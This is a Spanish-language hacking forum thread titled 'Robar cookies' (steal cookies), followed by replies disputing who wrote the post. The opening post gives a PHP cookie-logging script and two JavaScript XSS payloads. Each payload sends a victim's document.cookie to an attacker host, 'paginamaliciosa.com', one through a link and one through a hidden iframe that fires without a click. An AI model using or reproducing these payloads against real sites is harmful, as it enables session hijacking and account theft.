send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Robar cookies

  • 8 Respuestas
  • 4650 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Windero

  • *
  • Underc0der
  • Mensajes: 8
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Agosto 23, 2013, 07:14:41 pm »
Código: You are not allowed to view links. Register or Login
<?php

$cookie 
$_GET['NOMBRECOOKIE']; // Recibimos el valor del parámetro NOMBRECOOKIE
$conexion fopen("cookies.txt""a"); // Abrimos el archivo cookies.txt para escribir al final de él
fwrite($conexion"$cookie"); // Escribimos el contenido almacenado en la variable $cookie
fclose($conexion); // Cerramos el archivo

?>


Ahora bien, esto no sirve para robar cookies. Con este código simplemente escribes el contenido de NOMBRECOOKIE en la URL (es decir, recibirías lo que hay aquí: smileysocultos.webcindario.com/?NOMBRECOOKIE=...valor...
Pero si entras en la página el usuario tendría que escribir su cookie manualmente en el parámetro, y sinceramente hay muchos lammers por el mundo pero no creo que encuentres muchos, y para eso es mejor decirle que te diga la cookie directamente xD

Otra cosa sería que encontraras un XSS  y hagas un enlace malicioso añadiendo la cookie con JavaScript al parámetro:
Código: You are not allowed to view links. Register or Login
document.write('<a href="http://paginamaliciosa.com/?NOMBRECOOKIE='+document.cookie+'">Haz click aquí para...quedarte sin cuenta.</a>');

Claro, también puedes hacer que el proceso sea automático en el caso de encontrar un XSS y que el usuario no tenga que hacer click, simplemente inyectas un iframe oculto y listo:
Código: You are not allowed to view links. Register or Login
document.write('<iframe src="http://paginamaliciosa.com/?NOMBRECOOKIE='+document.cookie+'" width="0" height="0" style="display: none;"></iframe>');

Fuente : iDarkHS - You are not allowed to view links. Register or Login
- Saludos
« Última modificación: Agosto 25, 2013, 07:27:42 pm por ZanGetsu »
-Un trabajo mierdero de una persona es el trabajo a tiempo completo de otra persona. (Jessica Gaston)

Desconectado Metadato

  • *
  • Underc0der
  • Mensajes: 59
  • Actividad:
    0%
  • Reputación 0
  • C / C++ & ASM
    • Ver Perfil
« Respuesta #1 en: Agosto 23, 2013, 07:21:25 pm »
Por favor, podrías poner los créditos al usuario que escribió esto y de donde los sacaste.

Saludos.  ;)

Desconectado Bruj0

  • *
  • Underc0der
  • Mensajes: 16
  • Actividad:
    0%
  • Reputación 0
  • Si Juegas Con Bruj0, Acabarás Hechizado.
    • Ver Perfil
    • Email
  • Skype: SrEn1gm4
« Respuesta #2 en: Agosto 23, 2013, 07:39:46 pm »
Buen Post, Jeje yo Hice uno Parecido en DD [DestroyDreams]

XNETXBRUJO  ~  MATAR O MORIR.
1328430605

Desconectado Windero

  • *
  • Underc0der
  • Mensajes: 8
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #3 en: Agosto 23, 2013, 07:48:02 pm »
You are not allowed to view links. Register or Login
Por favor, podrías poner los créditos al usuario que escribió esto y de donde los sacaste.

Saludos.  ;)

Créditos: ndk

Fuente: Mi cerebro

Saludos ;)
-Un trabajo mierdero de una persona es el trabajo a tiempo completo de otra persona. (Jessica Gaston)

Desconectado Metadato

  • *
  • Underc0der
  • Mensajes: 59
  • Actividad:
    0%
  • Reputación 0
  • C / C++ & ASM
    • Ver Perfil
« Respuesta #4 en: Agosto 24, 2013, 06:22:41 am »
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
Por favor, podrías poner los créditos al usuario que escribió esto y de donde los sacaste.

Saludos.  ;)

Créditos: ndk

Fuente: Mi cerebro

Saludos ;)

No es cierto, eso que has copiado y pegado es una respuesta del usuario de Holoscripter: iDarkHS,

Deja de rippear.

Desconectado Sanko

  • *
  • Underc0der
  • Mensajes: 541
  • Actividad:
    0%
  • Reputación 0
  • ¿Puedes?
    • Ver Perfil
    • Underc0de
« Respuesta #5 en: Agosto 24, 2013, 07:19:48 am »
Estamos ante una plaga de kiddies de HS, please, no más usuarios de un foro en el que se dedican a tirar havij contra holos de habbo.
Sigueme en Twitter : @Sankosk
Estos nuevos staff no tienen puta idea XD

Desconectado MagoAstral

  • *
  • Underc0der
  • Mensajes: 118
  • Actividad:
    0%
  • Reputación 0
  • Nada resulta más engañoso que un hecho evidente.
    • Ver Perfil
« Respuesta #6 en: Agosto 24, 2013, 10:33:51 am »
You are not allowed to view links. Register or Login
Estamos ante una plaga de kiddies de HS, please, no más usuarios de un foro en el que se dedican a tirar havij contra holos de habbo.
Sanko, que me diga esto un chaval de estos, todavía lo puedo entender.
¿Pero tú?, eso ya no tío, mira entiendo que no te guste que vengan estos individuos y hagan aportes un tanto extraños, pero no debes culpar a una comunidad por un usuario, aparte creo que tienen derecho a aprender (unos más que otros), no creo que nadie haya nacido aprendido.
Y bueno HoloScripter, es una comunidad dedicada al scripting, no al hacking y murió cuando inmortal y cornamenta dejaron de desarrollar las packetlogger con funciones de inyección de paquetes el en los emuladores de los "habbo holos", y seguro que muchos de aquí no tienen los suficientes conocimientos de criptografía que algunos usuarios de HoloScripter.
Dejando de lado el comentario, aver cuando hablamos colega, un saludo y un abrazo :) Sankete!!!
Lo que sabemos es una gota de agua; lo que ignoramos es el océano.

Desconectado Metadato

  • *
  • Underc0der
  • Mensajes: 59
  • Actividad:
    0%
  • Reputación 0
  • C / C++ & ASM
    • Ver Perfil
« Respuesta #7 en: Agosto 24, 2013, 10:49:50 am »
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
Estamos ante una plaga de kiddies de HS, please, no más usuarios de un foro en el que se dedican a tirar havij contra holos de habbo.
Sanko, que me diga esto un chaval de estos, todavía lo puedo entender.
¿Pero tú?, eso ya no tío, mira entiendo que no te guste que vengan estos individuos y hagan aportes un tanto extraños, pero no debes culpar a una comunidad por un usuario, aparte creo que tienen derecho a aprender (unos más que otros), no creo que nadie haya nacido aprendido.
Y bueno HoloScripter, es una comunidad dedicada al scripting, no al hacking y murió cuando inmortal y cornamenta dejaron de desarrollar las packetlogger con funciones de inyección de paquetes el en los emuladores de los "habbo holos", y seguro que muchos de aquí no tienen los suficientes conocimientos de criptografía que algunos usuarios de HoloScripter.
Dejando de lado el comentario, aver cuando hablamos colega, un saludo y un abrazo :) Sankete!!!

Totalmente de acuerdo, un saludo compa.

Desconectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5267
  • Actividad:
    48.33%
  • Reputación 26
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #8 en: Agosto 24, 2013, 10:52:12 am »
Como dijeron mas arriba, este post esta rippeado, y no solo eso, sino que dices que es tuyo?

El post es de iDarkHS: You are not allowed to view links. Register or Login

Agrega el autor y la fuente y deja de decir que es tuyo.


 

¿Te gustó el post? COMPARTILO!



Cookies by: Refused

Iniciado por dracko.rx

Respuestas: 0
Vistas: 1798
Último mensaje Febrero 24, 2010, 02:20:52 pm
por dracko.rx